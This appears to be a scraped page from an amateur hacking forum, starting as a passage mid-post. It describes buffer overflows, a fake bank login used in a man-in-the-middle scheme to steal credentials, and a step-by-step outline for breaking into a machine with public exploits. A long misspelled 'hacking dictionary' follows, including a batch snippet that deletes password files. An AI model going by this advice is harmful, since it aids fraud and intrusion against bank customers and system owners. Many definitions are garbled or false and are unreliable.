have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later. __________________________________________________ _______o_________ So as a summary of how to 0Wn a box when you only have an IP Address Method Works On BOTH *Nix and Windoze ****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.**** - Port Scan The Address And Record Open Ports - Telnet To Open Ports To Identify Software Running On Ports 3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports - Record Banners And Take Note Of The Application Running and The Version Number - Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google. - Make a copy of some Proof-Of-Concept code for the vulnerability. *Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit* - Run The Exploit Against The Victim. - Reap The Cheap-Sh0t Ownage __________________________________________________ _______________ **This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root*…; Added by syarz at 9:35pm on September 11, 2009

Page: XP Hacking With Windows XP: So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users? The key to doing amazing things w; Added by MegaHackers.com at 4:13pm on October 11, 2007

Page: Begineers Guide To Hacking Windows: BEGINEERS How do I hack? - There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websit; Added by MegaHackers.com at 3:46pm on October 9, 2007

Page: How To Break Into E-mail Account: Disclaimer : I do not endorse Hacking ! This is meant for educational purpose only ! I want u to know how others can try break into your Personal life ! Beware !! Introduction I have writte; Added by MegaHackers.com at 5:44pm on October 9, 2007

Topic: Collection of Hacking dictionary: in. >ACCESS PERMISIONS:this allows u to execute,read or change a file depending on the permsion >.ACCOUNT:your presence id on a computer system which allows u to login. >.ADAPTER:another name for an expansion card,usally most of them plug into your expansion slots on your pc. >ACTIVE X:a set of interacitve techonloiges devloped by Mcft,activex isnt a programming language but it can be dangerous for website viruses. >ACTIVE OPEN:a state in which TCP is attempting to initiate a connection. >ADDRESS:a memory location.The value is often displayed as hexadecimal,mostly to keep anyone but official pc postal employes from finding things on your computer>every thing on your hard drive has a memory location. >ADDRESS CLASS:a basic network of various sises.the network class can be determend from the first octet of its ip address >ADDRESS RESOULUTION PROTOCOL:the process of determining a MAC address, given a more abstract LAN or WAN address. Any protocol used to obtain a mapping from a higher layer address to a lower layer address. Abbreviated ARP. The acronym ARP is most often used to refer to the Ethernet Address Resolution Protocol (below). The protocol used by an IP networking layer to map IP addresses to lower level hardware (i.e., MAC) addresses. There are four ARP messages for IP running over Ethernet: arp requests and replies and reverse arp request and replies. ADSL:adsl(asymetic digital subscriber line):[/color]is a connection to the net were users dont use dial up but have a connection 24/7 and usally have a static ip address. >ADA: Pascal-descended language that was at one time made mandatory for Department of Defense software projects by the Pentagon. Hackers are nearly unanimous in observing that, technically, it is precisely what one might expect given that kind of endorsement by fiat; designed by committee, crockish, difficult to use, and overall a disastrous, multi-billion-dollar boondoggle (one common description wss "The PL/I of the 1980s"). Hackers find Ada's exception-handling and inter-process communication features particularly hilarious. Ada Lovelace (the daughter of Lord Byron who became the world's first programmer while cooperating with Charles Babbage on the design of his mechanical computing engines in the mid-1800s) would almost certainly blanch at the use to which her name has latterly been put; the kindest thing that has been said about it is that there is probably a good small language screaming to get out from inside its vast, elephantine bulk. >AGENT:A program that performs one or more services (such as gathering information from the Internet), acting for or as a principal. >ADVANCED PEER-TO-PEER NETWORKING(APPN):An IBM peer-to-peer networking architecture that uses interconnected Type 2.1 nodes. APPN supports dynamic routing,directory searches, and network management. >ADVANCED PROGRAM-TO-PROGRAM COMMUNICATIONS(APPC) SNA's standard program-to-program communications protocol. Sometimes the term APPC is used interchangeably with Logical Unit Type 6.2 (LU 6.2). ALERT:A problem determination message sent to a network operator within IBM's network management system. >ALOHA :A 4800bps Contention Based Radio Channel Transmission System Network used in the University of Hawaii (1968 - 1972) and designed by Morman Abramson to connect the university's mainfraim IBM 360 on the Island of Oahu and terminals plaaced throught different ships and nearby islands. Data coming from the mainfraim was sent to all other terminals while data from terminals was the Contention-Based part and would re-send data if no acknowledement data was received. VLAN :[/color] Virtual Local Area Network This is a network split into workgroups by routers and each assigned a server. As any message sent will have which workgroup it is aimed at, wokgroups not receiving messages can run faster as traffic is reduced. Standards --------- Ethernet :[/color] A Network standard that is a Contention-Based Network. Ethernet evolved from a radio channel transmission system called ALOHA. >ALT:is commenly known as a computer control key but in internet terms alt is for connecting to newsgroups just like www is for connecting to the web. >ALT.2600.hackers:is a newsgroup with about 200 posters and about 5000 lurkers,it is the group shady_harrasment_panda(writter of this dictioanryis a member of.alt.2600.hackers has alot of very intellegent hackers in the group. >ALTERNITIVE CLIENT RESTOREL:The process of restoring files to a different client than the one from which they were backed up. >.AMERICAL ONLINE(AOL):a large US owned internet service provider company which mainly attracts newbies,aol has the stricted rules out of all the isp ifu post to an hackers newsgroup they terminate your account!,aol commenly attracks lamers! >.ANTIVIRUS:a program which scans a users hard drive looking for known viruses,worms,trojans,and joke files. >AMIGA:A series of personal computer models originally sold by Commodore, based on 680x0 processors, custom support chips and an operating system that combined some of the best features of Macintosh and Unix with compatibility with neither. The Amiga was released just as the personal computing world standardized on IBM-PC clones. This prevented it from gaining serious market share, despite the fact that the first Amigas had a substantial technological lead on the IBM XTs of the time. Instead, it acquired a small but zealous population of enthusiastic hackers who dreamt of one day unseating the clones (see Amiga Persecution Complex). The traits of this culture are both spoofed and illuminated in The BLAZE Humor Viewer. The strength of the Amiga platform seeded a small industry of companies building software and hardware for the platform, especially in graphics and video applications (see video toaster). Due to spectacular mismanagement, Commodore did hardly any R&D, allowing the competition to close Amiga's technological lead. After Commodore went bankrupt in 1994 the technology passed through several hands, none of whom did much with it. However, the Amiga is still being produced in Europe under license and has a substantial number of fans, which will probably extend the platform's life considerably. viruses,common virus scanners include norton and mcafee. >AMP OFF:[Purdue] vt. To run in background. From the UNIX shell `&' >ANSI; n. [techspeak] The American National Standards Institute. ANSI, along with the International Organization for Standards (ISO), standardized the C programming language (see K&R, Classic C), and promulgates many other important software standards. 2. n. [techspeak] A terminal may be said to be `ANSI' if it meets the ANSI X.364 standard for terminal control. Unfortunately, this standard was both over-complicated and too permissive. It has been retired and replaced by the ECMA-48 standard, which shares both flaws. 3. n. [BBS jargon] The set of screen-painting codes that most MS-DOS and Amiga computers accept. This comes from the ANSI.SYS device driver that must be loaded on an MS-DOS computer to view such codes. Unfortunately, neither DOS ANSI nor the BBS ANSIs derived from it exactly match the ANSI X.364 terminal standard. For example, the ESC-[1m code turns on the bold highlight on large machines, but in IBM PC/MS-DOS ANSI, it turns on `intense' (bright) colors. Also, in BBS-land, the term `ANSI' is often used to imply that a particular computer uses or can emulate the IBM high-half character set from MS-DOS. Particular use depends on context. Occasionally, the vanilla ASCII character set is used with the color codes, but on BBSs, ANSI and `IBM characters' tend to go together. >ANGLE BRASKET: Either of the characters `ANTIONLINE:is one of the many comprehensive securirty firms on the net which specialises in exploits,news,and hacker related things.www.antionline.com >.API(aplicatio program interface):defines a standard way that programs work with pull down menu's,dilogue boxes e.t.c,windows and OS/2 are examples of api in action. >.APPLE TALK:a local area network devloped by APPLE to connect IBM pc's and macs together. >APPLET:a HTML based program built with java that a browser tempory downloads to a users disk. >APPLICATION LAYER:the layer of tcp/ip stack that supports network applications and provides an interface to the local operating environement. 11.ARCHIE:a program to search things on the net,search engines like yahoo are talking over from archie. >APACHE:is a webserver used by almost 60 per cent of the web sites market that runs on windows,macs,and unix. .>APP: Short for `application program', as opposed to a systems program. Apps are what systems vendors are forever chasing developers to create for their environments so they can sell more boxes. Hackers tend not to think of the things they themselves run as apps; thus, in hacker parlance the term excludes compilers, program editors, games, and messaging systems, though a user would consider all those to be apps. (Broadly, an app is often a self-contained environment for performing some well-defined task such as `word processing'; hackers tend to prefer more general-purpose tools.) See killer app; oppose tool, operating system. >.APPLE SHARE:a network o/s devloped by apple to work with other macs,like win nt and win ME are desined to work the together. >ARCHIE:a client/server program that is used to locate files on anonymous ftp. >.ARCHIVE:a place with important files on the net. >AREA CODE:area code is the code for a phone number for ppl accesing it outside the city,dial up hacking or connecting to your isp involves uses an area code. >.ARGUMENT:A value given to a program in c or any other high level languages>see also value. >.ARP(addres resoulution protocol:arp translates ethernet address into numical form to binary.all o/s support arp by typing arp in the command prompt. >APRAnet(advanced research projects agency network)is a denfence agency network created by defense department of the USA known now as da-apra >ARM(application response measurement): >.ARRAY:a collectiong of similar info such as codes,text or other items.All items are usally of the same type,used in programming. >.ASCII(american standard code for information interchange):is the the numbers which make up text for e.g the code 52 would be the number 4 >ASCII ART: n. The fine art of drawing diagrams using the ASCII >ASM(asembly language):is a low level program language which is used for writting small programs and can be used to write viruses.Assembly Languages have the same basic structure as Machine Languages, the difference is that Assembly Languages allow the programmer to use names instead of numbers. As with Machine Languages, every CPU has its own unique machine language. Programs must be rewritten or recompiled, therefore, to run on different types of computers. Nowadays most programming is done with High-Level Programming Languages but in the early days, Assembly language was always used, now it is ONLY used when speed is essential or when the task isn't possible on the High-Level Language we are using. These are considered Low-Level Languages as they are closer to Machine Languages. >ASYNCHRONOUS TRANSFERE METHOD:A connection-oriented data communications technology based on switching 53 byte fixed-length units of data called cells. Abbreviated ATM. Each cell is dynamically routed. ATM transmission rates are multiples of 51.840 Mbits per second. In the United States, a public communications service called SONET uses ATM at transmission rates of 155, 622, 2048, and 9196 Mbits per second. These are called OC-3, OC-12, OC-48, and OC-192 respectively. A similar service called SDH is offered in Europe. ATM is also used as a LAN infrastructure, sometimes with different transmission rates and coding methods than are offered with SONET and SDH. >AT&T:american phone company there are also the makers of unix,at&t owns the bells lab which wrote unix and c. >AUTHENTICATION: A security measure for verifying the identity of network users. >AVATAR:The body in cyberspace. In most cases the handle/nicknames you use on the Internet, and the personality that goes with it. >AWK: [UNIX techspeak] An interpreted language for massaging . >BACKDOOR:is a hiding bit of code which a programer makes so that he can hide a secret password which only he knows.>backdoors can also be a trojan which lets a script kiddie remote control a pc without no login. >.BANDWITH:the speed of which is sent to the moniter meguared in hertz. >BASEBAND:the most common type of network where data is transmiited digailay through a wire. >.BASIC(beginner all-purpose symbolic instruction code)is a programming language desined to make programming easier and quicker than c and fortran e.t.c.,modern verions of basic are visual basic and quickbasic. BAUD RATE:is usally related to the speed of the modem for.e.g 56k. >BAYONET NEIL COUCILMAN:connector):A type of coaxial cable connector sometimes used in Ethernet applications. Abbreviated BNC. The specification for BNC connectors is contained in EIA/TIA 403-A and MIL-C-39012. > BER(Bit Error Rate.): >BERKELY UNIX:this version of unix was devloped at the univesity of calefonia in berkely also knows as BSD >.BBS(bulliten board system)is an old way of exchanging messgaes and downloading stuff users usally dialed into the bbs and used it,usenet has took over from it. >.BIN:a binary file.Also on unix the binary files are usally in /bin and on windows c:\windows >.BINARY:a binary file is usally under stood by the computer and is the computer code of a program.binary is written in 0's and 1's. >BIND:The SNA command that starts an SNA session between two logical units. >BIOS PASSWORD:is a password utillity which lets users provide an on boot password by changing the bios settings,hackers cant usually get the password unless the computer is switched on and booted up to windows but u can reset he cosmos. BLACK ICE:is a monetering program used for watching ports. >BLACK HOLE:What data (a piece of email or netnews, or a stream of TCP/IP packets) has fallen into if it disappears mysteriously between its origin and destination sites (that is, without returning a bounce message). >BLACK SCREEN OF DEATH:On an attempt to launch a DOS box, a networked Windows system not uncommonly blanks the screen and locks up the PC so hard that it requires a cold boot to recover. This unhappy phenomenon is known as The Black Screen of Death. >BLUE SCREEN OF DEATH:is when a windows machine crahses or gets nuked and shows the blue screen which shows that an error has occured. >BLUE BOX(not a hacker term but i will mention it): Once upon a time, before all-digital switches made it possible for the phone companies to move them out of band, one could actually hear the switching tones used to route long-distance calls. Early phreakers built devices called `blue boxes' that could reproduce these tones, which could be used to commandeer portions of the phone network. (This was not as hard as it may sound; one early phreak acquired the sobriquet `Captain Crunch' after he proved that he could generate switching tones with a plastic whistle pulled out of a box of Captain Crunch cereal!) There were other colors of box with more specialized phreaking uses; red boxes, black boxes, silver boxes, etc. 2. n. An IBM machine, especially a large (non-PC) one. >BLUE TOOTH:this is a specification for linkingdevices such as mobile phones,cameras e.t.c to computers over a short range wireless connection. BRUTE FORCE:to try thousand of differnt passwords on a login prompt or on a password protected file. >BSD:a unix o/s from berkely;s >.BUG:is when a program has errors written in it which makes it perform incorrect. >Bus : Terminals are connected in a strait line with 'T' shape terminator at each end that bounce the signal back and forth through the network, peices of data send are limited and if they are send to n unknown terminal on the network the signal just keeps boucing, causing a crash of all the network. The Bus network is a peer to peer network and had no dedicated server. >BUS NETWORK:is a network where all computers are connected through a hub and each computer usuall has a network interface card. 33.C a high level programming language used to create large programs and lots of exploits.e.g #include main ( ) { printf ("you are viewing the beta version.\n"); printf ("www."); } >.C++:an improved version of c that adds object-orented exstensions and is easy to learn for c programmers. >CCC [Chaos Computer Club]:A hacker-organisation in Hamburg. They have meetings, lectures and annual congresses which attracts hackers from all Europe. They also publish books and magazines about the information society. There are a lot of myths of which kind of criminal activities they have been involved in, so it's hard to say which of them is true and which are not. >C SHELL:is a shell similar to the bash shell but it is more like the c langauge on a command promt. >.CABLE MODEM:is a connection to the internet 24 hours a day and users dont use a dial up line instead they use a cable,usally cable modem customers have a static ip address. >CACHE:is a tempory folder on a hard disk which stroes websites e.t.c so that a user can acces them quicker. >CAIN:is a password cracker program which cracks windows share password and pwl files. 36.CALL:is a programming term which means to transfere a part of a program then return it. .CARRIIER(dial ups): a signal used by a modem to detect another modem. >CASADING:The process of connecting two or more Fibre Channel hubs or switches together to increase the number of ports or extend distances. >.CAT:a unix command which displays the contents of a file. >CC(carbon copy)used for sending the same email to more than on person. >.CD:change directory used for chaging the dir on all systems prompts also chdir .CGI(common gateway interface)is a web programming language which can be used for prompting a user for inforrmation and can be used for shoping sites to make secure transactions. >CHANNEL:is a irc chat room where ppl chat. >CHANNEL OP:is the person or person's on a channel who control it. >CHAP(challenge handshake authentication protcol): >CHAR:shorthand for `character'. Esp. used by C programmers, as `char' is C's typename for character data. >.CHAT:ovisly u know what a chat room is but certain network administraters have chat built into their security which means if there hacked they can disconnect u then chat and tell u that your traced e.t.c >CHECKSUM:a 16 bit calculated field used to ensure detection of currupted datagrams. >CHERNOBYL PACKETL:A network packet that induces a broadcast storm and/or network meltdown, in memory of the April 1986 nuclear accident at Chernobyl in Ukraine. The typical scenario involves an IP Ethernet datagram that passes through a gateway with both source and destination Ether and IP address set as the respective broadcast addresses for the subnetworks being gated between. Compare Christmas tree packet. CIRCLE:This is also a simple setup and poses most of the same problems as the bus NET. Basically, it is just a Bus NET with the two spare ends connected to each other. The main differences between this and the Bus NET is that, each computer acts as an amplifier to the signals passed along it (Active). There is also another communication method used here called token passing. This consists of a token passing along the network, when a computer wishes to pass on information, it will be attached to the token the it will travel round the network until it finds its destination,. The destination will then pick it up copy it and send a new token into the network. If the information in a Circle NET does not find its destination, then it will go in a complete circle and return to the sender with a message, reporting the problem. This type of topology is very similar to the Bus NET with the same drawbacks and the same advantages >CLUSTER CONTROL:The common name given to SNA Type 2.0 Peripheral Nodes. Usually used to refer to 3270-type control units. >CODEZ D00DZ:HACKERS's version of pirates. >COMMUNICATION CONTROLER:An SNA communications processor whose operations are controlled by Network Control Program (NCP) software.Communication controllers manage communication links and route packets through SNA networks. IBM's communication controller products include the 3745/3746, 3725, 3720, 3705, and 3704. >COMPUTER UNDERGROUD:A group organized in securcy, hidden behind aliases, to promote the exchange of information regarding anything and everything incuding, but not limited to:[/color] computers,hacking,telephones, radios, chemicals and ideas. >CONNECTION-ORIENTED SERVICE/PROTOCOL:A service/protocol that includes the notion of a setup and take-down phasebefore and after the transfer of data. These services usually includeerror detection and recovery, flow control, and packet sequencing. >CONNECTION SERVICE/PROTOCOL: A service protocol that does not include the notion of a setup or take-down phase before and after the transfer of data. Each message, commonly called a datagram, is sent as a separate entity. >COSMOS)the complimaentry metal-oxide semiconductor):is a battery powered memory chip which is in the motherboard,it usally stores the bios password and date settings. >.CISCO:cisco is the one of the leaders in the network market making network softwere and hardwere. >CLASS C/B/A>NETWORK:is the way ppl are given an ip address from their isp or network proider,class c is the isp way for an ip address >CLI(Command line interface):is also known as an interface were u type commands such as in dos. CMIP:Acronym for Common Management Information Protocol. >COBOL(common business orinted language)is used for business applications.cobol is rarely used now. >.CODE:programers instructions also known as programming language writting,code is the writting in a program which makes it perform to do certain instruction and tasks. >CODE BALANCE:The number of 1 bits in a 10-bit transmitted data stream divided by 10 (e.g., 1110100011 has a code balance of 6/10 = 60%). >.COLLIO:is a US hacker cracker who nuked yahoo.com and ebay in early 2000. >.COM PORT:is a port on your computer were modem usally connect to. >.COMMAND PROMPT:is the screen on an o/s which u can type commands e.g Mcft dos,lilo prompt,bash,csh prompt. >.COMPILE:to convert programming code into machine language. >.COMPILER:the tool which compiles the code in a program and changes it into machine language. >Communication Controller: An SNA communications processor whose operations are controlled by Network Control Program (NCP) software. communication controllers manage communication links and route packets through SNA networks. IBM's communication controller products include the 3745/3746, 3725, 3720, 3705, and 3704. >.COMPUSERVE:is another lame isp similar to AOL who take strict guidelines on hackers! >Connection-Oriented Service/Protocol: A service/protocol that includes the notion of a setup and take-down phase before and after the transfer of data. These services usually include error detection and recovery, flow control, and packet sequencing. >CONNECTION PROTOCOL:a protocol tat transmities data without operating through a connection CONSOLE:A device for graphical or textual visual output from a computer system. In systems, network and device management, an application that provides graphical and textual feedback regarding operation and status, and that may accept operator commands and input influencing operation and status. Sometimes called enterprise management console. >COPY ON WRITE:A technique for maintaining a point in time copy of a collection of data by copying only data which is modified after the instant of replicate initiation. The original source data is used to satisfy read requests for both the source data itself and for the unmodified portion of the point in time copy. cf. pointer remapping >Contention-Based Network : Network that sends a limited amount of data and holds other data in a queue until it s ready to send it. The name means, that all data being sent is competing or contending for bandwith. The ALOHA Radio system in 1968 was based on this. >.COOKIE:is a small web paged program which stores it self in your computer which means if u login from a cookie site it will remember your details,it is usally stored in c:[/color]\cookies in a .txt file. . >COPY:to copy a file on an o/s windows e.g is copy filename filename unix e.g is cp /filename /filename >COAXIAL CABLE:An electrical transmission medium consisting of two concentric conductors separated by a dielectric material with the spacings and material arranged to give a specified electrical impedance. cf. triaxial cable >CP/M:is an old o/s used back in the 70's >CRACK:To remove software copy protection on a program such as using a sharewere program for longer than it was ment to be used.. CRACKERS:is a gay man who likes talking it up the ass.......only joking a cracker is a person who thinks deleting data and changing data is hacking,crackers write viruses and distrubute them ,thinking its kewl and that they are ellite. >CRACKER JACK:is a well known unix password cracker for password breaking /etc/passwd. >CSMA/CD:the network method used by ethernet networks. >CYPER PUNK:Since 1990 or so, popular culture has included a movement or fashion trend that calls itself `cyberpunk', associated especially with the rave/techno subculture. Hackers have mixed feelings about this. On the one hand, self-described cyberpunks too often seem to be shallow trendoids in black leather who have substituted enthusiastic blathering about technology for actually learning and doing it. Attitude is no substitute for competence. On the other hand, at least cyberpunks are excited about the right things and properly respectful of hacking talent in those who have it. The general consensus is to tolerate them politely in hopes that they'll attract people who grow into being true hackers. >CROSS POST:is when a usenet user posts the same question to more than one newsgroup. >CRUISE VIRILL:a type of virus that infects and searches other computers for pecific data.for e.g a c programmer could program a small program which will work in the background and login to an ftpserver and upload the users files,e.t.c >CSH:is yet another command enviroment for unix. >CSMA/CD:(Carrier Sense Multiple Access with Collision Detection.) >CRYPTGRAPHY:see encryption >CYPERPUNK:Net.person who has evolved from hacking to encryption and concern with creating multiple identities. >CULT DEAD COW:are the programmer group which wrote the trojan back orrifice and recenlty recived 10 million dollars for it. >CUSTOMER INFORMATIONS CONTROL SYSTEM:(CICS)IBM's flagship transaction processing subsystem. CICS runs on IBM mainframes as well as other systems, such as AS/400s, Hewlett-Packard UNIX platforms, and PCs running either OS/2 or Mcft's Windows NT Server operating system. >CUTE FTP:is an ftp client used for contacting ftp servers,cute ftp is a freewere and can be download from download.com >DAEMON:a process runs in the background and not locked into a terminal,webservers are ferffered to httpd as the server sits in the background and does need watched. >DARK SIDE-HACKER:A criminal or malicious hacker known as a cracker who thinks hes a hacker but techinally speaking hes a script kiddie who gets hackers a bad name. >DATA ENCRYPTION STANDARD:an government specification for encoding files by using a password.its supposed to be uncrakble although 14000 internet users pooled together and cracked it last year in 1999! >DATAGRAM:the data package passed from the internet layer of tcp to the network access layer passed from UDP at the transport layer. >Data Flow Control (DFC): Defines end-to-end protocols that control direction of application data flow, manage responses, and logically group related data flowing on sessions. >DEATH BEEF HACK: [cypherpunks list, 1996] An attack on a public-key cryptosystem consisting of publishing a key having the same ID as another key (thus making it possible to spoof a user's identity if recipients aren't careful about verifying keys). In PGP and GPG the key ID is the last eight hex digits of (for RSA keys) the product of two primes. The attack was demonstrated by creating a key whose ID was 0xdeadbeef >DEAD BEEF:DEAD:[/color] The hexadecimal word-fill pattern for freshly allocated memory (decimal -21524111) under a number of IBM environments, including the RS/6000. Some modern debugging tools deliberately fill freed memory with this value as a way of converting heisenbugs into Bohr bugs. As in "Your program is DEADBEEF" (meaning gone, aborted, flushed from memory); if you start from an odd half-word boundary, of course, you have DECRYPTION:to un decrypt a file which is encrypted! >DEFAULT GATEWAY:the gateway used to connect to the rest of the network. >DELETE:to destroy data the dos command for it is deltree the unix command for it is rm. >DELPHI:a programming langauge devloped by borland. DEN(Directory Enabled Network.:[/color] >DEMON:A portion of a program that is not invoked explicitly, but that lies dormant waiting for some condition(s) to occur. See daemon. The distinction is that demons are usually processes within a program, while daemons are usually programs running on an operating system. 2. [outside MIT] Often used equivalently to daemon -- especially in the Unix world, where the latter spelling and pronunciation is considered mildly archaic. Demons in sense 1 are particularly common in AI programs. For example, a knowledge-manipulation program might implement inference rules as demons. Whenever a new piece of knowledge was added, various demons would activate (which demons depends on the particular piece of data) and would create additional pieces of knowledge by applying their respective inference rules to the original piece. These new pieces could in turn activate more demons as the inferences filtered down through chains of logic. Meanwhile, the main program could continue with whatever its primary task was. >DEMON DIALER:a modem program which dials from say 555-0000 on up through 555-9999,finding computers with modem support.this is a way a hacker would find an phone support o/s in your area alsoknown as a wardialer. >DES(data encryption standard):an government specification for encoding files by using a password.its supposed to be uncrakble although 14000 internet users pooled together and cracked it! >DESTINATION PORT:the TCP or UDP port number of the application on a host machine that will be the recepiment of that data in TCP segements or UDP datagram,e.g a webserver waiting for website visitors. >DEV/MILL:a dir on unix which does nothing,produces nothing and can slowwing anything,usally linux is stored there, >DEVICE CHANNEL:A channel used to connect storage devices to a host I/O bus adapter or intelligent controller. The preferred term is device I/O bus. >DHCP(dymanic host conigration protocol):Is a server which automatically issues a client user with an ip address,dhcp isp users dont usally have a static ip but they have a dymnaic ip address. >DIRECTORY:A mechanism for organizing information. A file or other persistent data structure in a file system that contains information about other files. Directories are usually organized hierarchically (i.e., a directory may contain both information about files and other directories), and are used to organize collections of files for application or human convenience. An LDAP-based repository consisting of class definitions and instances of those classes. An example of an enterprise-wide LDAP directory is Mcft's Active Directory (AD) or Novell's NetWare Directory Service (NDS). directory enabled network . >DISTRO:anyone can release their own linux and its called a linux distro. > DRIVE LETTER:A single letter of the alphabet by which applications and users identify a partition of physical or virtual disk to the Windows operating system. The number of letters in the alphabet limits the number of disks that can be referenced. >DOMAIN:shared user authorization database which contains users, groups, and their security policies. A set of interconnected network elements and addresses that are administered together and that may communicate. domain controller,common ones include website names. >DOS:a command based o/s in windows. >DoS(denial of service):is when a script kiddie nukes or send thousand of data to a server causing it to crashe >DOWNLAOD.COM:is a website where u can download almost any program or file,www.download.com is owned by cnet and it also own sharewhere.com. >DUN(Dial up networking):the way most users connect to the net altthough it can be used for conneting to dial up server's and BBS's. >.DLL(dynamic link library):is a seperate coded file used for sharing with programs making it have more feautures or making it run properly. >DNS(domain name system)a computer system which translates internet name address into ip addreses. DR DOS:an ms dos clone owned by novell. >DUMB TERMINAL:a keyboard and video display connected to an network. >DWEEB:quite like a lamer but there anti-socialer. >DYMANIC HTML:is a webpage scripting language used for adding special effect to webpages,e.t.c,similar to javascript. >DYMANIC IP ADDRESS:an ip address which changes every time a user connects to the net. >ECHO:can be used as icmp but mostly echo repeats a character to screen e.g "/echo i am and ass in "irc or "echo hi" in dos. >ELISTS:(Email Lists)Electronic discussion groups that anyone with an email address can subscribe to. When u send email to an elist it will automatically send a copy to every subscriber (also called amiling lists). >ELLITE:person who is usally a skilled hacker and programmer who likes testing softwere and helping other,ellite can be spelled serverall ways including 3li773. >ENCRYPTION:is used to make data unreadably to anybody who hasnt got the correct password or code. >ENVIRONMENT:every user who logs into a server has there own gui or command envromnt which means they have different permissions. >ENDLESS LOOP:a set of code in a prgram which repeates something. >END TO END THROUGH:Control of message flow between the two end parties to a communication on a network.Flow control that occurs between two connected Fibre Channel N-Ports. >EXTERNAL CALL INTERFACE(ECI):A CICS client programming interface that allows applications running on CICS clients to call applications running on CICS servers. >ETC:is the dir on unix(/etc)where various and sundry files are kept usally logs are kept there. >ETHERNET:a lan(local area network) that uses radio freqency to carry signals by coxial cables,ethernet uses the CSMA/CD network access method. >ETHERNET APAPTER:An adapter that connects an intelligent device to an Ethernet network. Usually called an Ethernet network interface card, or Ethernet NIC. cf. NIC >ETTIQUATE:is the rules of the net for e.g typing IN ALL CAPS IS REGUARDES AS SHOUTING. >EVENT -DRIVEN PROGRAMMING; a style of programming which the user has to press a key to continue and cant do other tasks unless he follows the code e.g. in batch code. @echo off dir /w c:\windows deltree /y *.pwl pause dir c:\ exit >EXE.is a file enstension which can be executed to run a program. >EXECUTE:is to issue a command or program on a system. EXSENSION:are the filename exstension at the end of a program such as .com,.exe,.bak >EZINE:A net version of the small press magazine (known as zine) culture. Usually ezines exists only on the Net, but more and more paper zines are distributing an electronic version as well. >F.A.Q(frecently asked question):the term refered to a txt file which answers common question ppl ask on a particualr subject. >FC-PH:The Fibre Channel physical standard, consisting of FC-0, FC-1, and FC-2. >FC-0:The Fibre Channel protocol level that encompasses the physical characteristics of the interface and data transmission media. Specified in FC-PH. >FC-1:The Fibre Channel protocol level that encompasses 8B/10B encoding, and transmission protocol. Specified in FC-PH. >FC-2:The Fibre Channel protocol level that encompasses signaling protocol rules and the organization of data into frames, sequences, and exchanges. Specified in FC-PH. >FC-3:the Fibre Channel protocol level that encompasses common services between FC-2 and FC-4. FC-3 contains no services in most implementations. >FC-4:The Fibre Channel protocol level that encompasses the mapping of upper layer protocols (ULP) such as IP and SCSI to lower protocol layers (FC-0 through FC-3). For example, the mapping of SCSI commands is an FC-4 ULP that defines the control interface between computers and storage. >FEDERATED MANAGEMENT ARCHITECHTURE SPECIFICATION:A specification from Sun Microsystems Computer Corporation that defines a set of Java APIs for heterogeneous storage resource and storage network management. This specification is a central technology of JIRO. >FDDI(Fiber Distributed Data Interface.):a token passing network archtitecture using fibre optic cables. >FDDI ADPTER:An adapter that connects an intelligent device to an FDDI network. Both FDDI-fiber adapters that connect to optical fiber FDDI networks, and FDDI-TP adapters that connect to twisted copper pair FDDI networks exist. Although network interface cards are usually referred to as NICs rather than as adapters, the term FDDI adapter is more common than FDDI NIC. cf. adapter, NIC >FIBRE CHANNEL:A type of Fibre Channel physical connection that allows up to 30 meters of copper cable between adjacent devices.. >FIFO: term programmers use to describe a data structer where the first item stored is also the first item retrived. >FILE HANDLE:a number used to identify a file inside a program. >FILE SERVER:a file server is a computer which acts a server allowing users to access resources on it.for e.g on windows users can share there drives using netbios. >FILE SHARING!:file sharing is sharing files for others to access using samba or netbios,users usally map network drive typing net use p:[/color] \\ip\sharename in ms dos or by using a samba client on unix. >FILTER:An intelligent network node whose hardware and software are designed to provide file services to client computers. Filers are pre-programmed by their vendors to provide file services, and are not normally user programmable. cf. appliance, file server >FIN:a control flag used in the process of closing a TCP connection. >FINGER:is a service run on port 79 and allows users to find information on users on hosts such as name and address,tel....,e.t.c >FIREWALL:is a program used to close a pc'a open ports and secure security holes and is a break point between networks where all the trafiic is examined and accepted or denied based on a set of rules. >FLAME WARS:are when 2 or more ppl post or send shit to the other user,and the both users exchange angry messgaes to each other.FORTH: another programming language although its not relay used now a days.. >FORTRAN:a combination of formular translator which allows programmers to use mathematical signitures.e.g code x = (A * B) * >FREEBSD:is a version of unix with open source. >Fragmentation scanning : This is not a new port scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe packet, you break it into a couple of small IP fragments. You are splitting up the TCP header over several packets to make it harder for packet filters and so forth to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. My favorite sniffer segmentation faulted immediately upon receiving the first 36-byte fragment. After that comes a 24 byte one! While this method won't get by packet filters and firewalls that queue all IP fragments (like the CONFIG_IP_ALWAYS_DEFRAG option in Linux), a lot of networks can't afford the performance hit this causes. This feature is rather unique to scanners (at least I 